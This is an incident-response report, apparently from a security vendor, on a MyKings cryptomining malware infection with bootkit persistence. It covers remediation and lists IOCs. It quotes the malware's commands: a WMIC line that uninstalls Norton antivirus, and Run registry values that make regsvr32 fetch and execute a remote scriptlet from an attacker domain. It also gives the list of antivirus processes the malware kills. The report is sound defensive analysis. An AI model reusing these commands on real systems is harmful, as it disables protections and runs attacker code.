Investigating MyKings Malware Variant With Bootkit Persistence
MyKings Malware Variant With Bootkit Persistence
INCIDENT DESCRIPTION
This malware event was detected and blocked on the 16th of January, 2020, when a malicious application (winnts.exe) used a trusted application (powershell.exe) to download and run a malicious script from a malicious IP address. The malicious script was obtained and further analysis and Incident Response was carried out on the infected Server.
Upon more research and analysis of the batch file, we noticed that the script abused PowerShell and downloaded other malware files from the Command and Control Center IP address.
Our findings, as detailed in the next section, confirmed that the file is malicious, and subsequently, our analysts were able to contain the attack and remediate it on 4th March, 2020. This malware file attempted to uninstall other antivirus products on the system and created scheduled tasks that runs automatically to use hijack the system resources in order to mine cryptocurrency. The Type of Malware is called “My Kings Malware” which adds the system to a botnet used to mine cryptocurrency for the attacker.
SYSTEM AFFECTED BY INCIDENT | |
Type of Incident Detected | Malicious Code |
Potential Damages by Incident | Reduced System PerformanceNetwork Resources Consumption |
Attack Source | 167.88.180.175 |
Operating System of Affected System | Windows Server 2012 R2 Standard |
Additional System Details:The server has our malware defense suite installed on it, this allowed our analysts to carry out in-depth analysis on the malware, prevent and block the malware from running again. |
INVESTIGATION INDICATORS
In other to better analyze the file, we downloaded the script code and ran it in a sandbox with real-time interaction and process monitoring. From the analysis of the behavior activities, both malicious and suspicious, we were able to ascertain the tactics and techniques of the file. The file carried out actions similar to the following tactics and techniques:
- Execution
- Persistence
- Privilege Escalation
- Defense Evasion
- Credential Access
- Command and Control
The file used legitimate windows processes such as Registry, PowerShell, Scheduled Tasks and WMIC to schedule tasks, create and run processes, and dump other malware files in Windows Installation Directory.
Further investigation and analysis on other malware platforms showed the file to be malicious in nature and gave a threat score of 100/100 to the file.
Use of WMIC
The malware attempted to use the Windows Management Instrumentation to uninstall antivirus solutions. It queries popular antivirus solutions and attempts to uninstall them. Below is the command used in attempting to uninstall Norton antivirus program.
“C:\Windows\System32\Wbem\WMIC.exe” product where “name like ‘%Norton Security%’” call uninstall /nointeractive
REMEDIATION OF INCIDENT
Registry Edits
We checked to ensure that registry modifications carried out by the malware investigated, we also identified registry key edit and effectively remove them:
“HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN” /V “START” /D “REGSVR32 /U /S /I:HTTP://JS.FTP1202.SITE:280/V.SCT SCROBJ.DLL” /F
“HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN” /V “START” /D “REGSVR32 /U /S /I:HTTP://JS.FTP1202.SITE:280/V.SCT SCROBJ.DLL” /F
The content of one of the registry keys is seen in the figure below.
Trojan Agent and Downloader
We identified some Trojan downloaders and agents at the following locations respectively,
%WINDIR%\inf\aspnet\lsma.exe
%WINDIR%\inf\aspnet\lsma30.exe
%WINDIR%\inf\aspnet\lsma31.exe
%WINDIR%\inf\winnts.exe
%WINDIR%\debug\lsmo.exe
%WINDIR%\help\lsmosee.exe
Scheduled Tasks
Some tasks were scheduled to automatically run the malware. These tasks were found in the windows task scheduler and they include:
- my1
- Mysa
- Mysa1
- Mysa2
- Mysa3
- ok
- oka
These identified malware tasks were created by the malicious PowerShell script and were subsequently deleted from the server during our remediation attempt.
Rootkit Persistence
The malware installed a rootkit on the server which ensures that the malware gets loaded before the operating system boots up. This ensures that some listed anti-virus solution do not work and ensures that the malware returns after reboot. This was removed from the server. The list of the anti-virus solutions to be terminated are listed in the below.
avp.exe | acaegmgr.exe | sapissvc.exe |
superkiller.exe | avastsvc.exe | avgsvc.exe |
360sd.exe | bdagent.exe | aycagentsrv.ayc |
360safe.exe | mcshield.exe | liveupdate360.exe |
360rps.exe | mcsvhost.exe | 360rp |
kavfs.exe | mfefire.exe | qqpctray.exe |
sragent.exe | mfemms.exe | Mcshield.exe |
mbamservice.exe | arwsrvc.exe | shstat.exe |
avguard.exe | dwarkdaemon.exe | naprdmgr.exe |
avgnt.exe | vssery.exe | avgui.exe |
msmpeng.exe | ahnsdsv.exe | ekrn.exe |
nissrv.exe | asdsvc.exe | dwengine.exe |
msseces.exe | kavfswp.exe | spideragent.exe |
avengine.exe | mbamservice.exe | bdagent.exe |
savservice.exe | mbam.exe | hipsmain.exe |
nod32krn.exe | qhpisvr.exe | avastui.exe |
RECOMMENDATION
As identified during the investigation, the system was breached as a result of the Eternal Blue vulnerability existing on the computer. The system was updated and the malicious program was removed and the actions taken by it were reversed.
The following recommendations are to be put in place to prevent future re-occurrence of this incident.
- Applications should be downloaded from verified publishers only.
- The use of cracked/patched software should be avoided.
- Regular Windows update on all systems.
- Installation of EDR on all endpoints on the network to stop potential attacks and prevent it from infecting other systems on the network.
- Upgrading of the Server with the Windows Server image file so as to fix the problem with windows automatic updates.
- Disable unnecessary services such as RDP on internet facing computers.
Appendix
IOCs
IP Addresses:
103.106.250.161
167.88.180.175
167.88.180.188
173.247.239.186
199.168.100.74
Hashes
790c213e1227adefd2d564217de86ac9fe660946e1240b5415c55770a951abfd
fea935d2d0fb1abadb900f009b4c40bb8a91fd9e25cc76ed4f9dae08960566d5
Leave a Reply